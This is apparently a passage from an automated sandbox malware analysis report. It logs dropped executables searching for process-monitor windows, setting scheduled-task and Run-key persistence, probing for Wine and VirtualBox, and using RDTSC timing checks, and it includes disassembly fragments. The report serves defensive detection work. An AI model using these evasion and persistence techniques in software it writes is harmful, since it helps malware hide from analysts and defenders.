Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee8d47a049.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee8d47a049.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 36c3130eac.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 36c3130eac.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 55662d7496.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 55662d7496.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A843C4 second address: A83C4E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDAD10EAC3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e call 00007FDAD10EAC48h 0x00000013 mov ebx, dword ptr [ebp+122D2E4Eh] 0x00000019 pop eax 0x0000001a sub di, A468h 0x0000001f popad 0x00000020 push dword ptr [ebp+122D078Dh] 0x00000026 jo 00007FDAD10EAC37h 0x0000002c stc 0x0000002d sub dword ptr [ebp+122D24DDh], edi 0x00000033 call dword ptr [ebp+122D25D5h] 0x00000039 pushad 0x0000003a cld 0x0000003b ja 00007FDAD10EAC3Ch 0x00000041 mov dword ptr [ebp+122D228Ch], edi 0x00000047 xor eax, eax 0x00000049 mov dword ptr [ebp+122D26B3h], ebx 0x0000004f mov edx, dword ptr [esp+28h] 0x00000053 jmp 00007FDAD10EAC44h 0x00000058 mov dword ptr [ebp+122D2BDEh], eax 0x0000005e pushad 0x0000005f pushad 0x00000060 and eax, dword ptr [ebp+122D2EEAh] 0x00000066 add dx, 65BDh 0x0000006b popad 0x0000006c popad 0x0000006d mov esi, 0000003Ch 0x00000072 mov dword ptr [ebp+122D228Ch], ecx 0x00000078 add esi, dword ptr [esp+24h] 0x0000007c xor dword ptr [ebp+122D26B3h], eax 0x00000082 lodsw 0x00000084 add dword ptr [ebp+122D26B3h], ebx 0x0000008a add eax, dword ptr [esp+24h] 0x0000008e xor dword ptr [ebp+122D26B3h], ebx 0x00000094 stc 0x00000095 mov ebx, dword ptr [esp+24h] 0x00000099 cld 0x0000009a push eax 0x0000009b pushad 0x0000009c push eax 0x0000009d push edx 0x0000009e push eax 0x0000009f push edx 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A83C4E second address: A83C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A83C52 second address: A83C64 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDAD10EAC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FDAD10EAC36h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00174 second address: C00194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FDAD0CA5E33h 0x0000000a jnp 00007FDAD0CA5E2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00194 second address: C001C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 jne 00007FDAD10EAC36h 0x0000000d jmp 00007FDAD10EAC41h 0x00000012 pop esi 0x00000013 push ecx 0x00000014 jmp 00007FDAD10EAC42h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
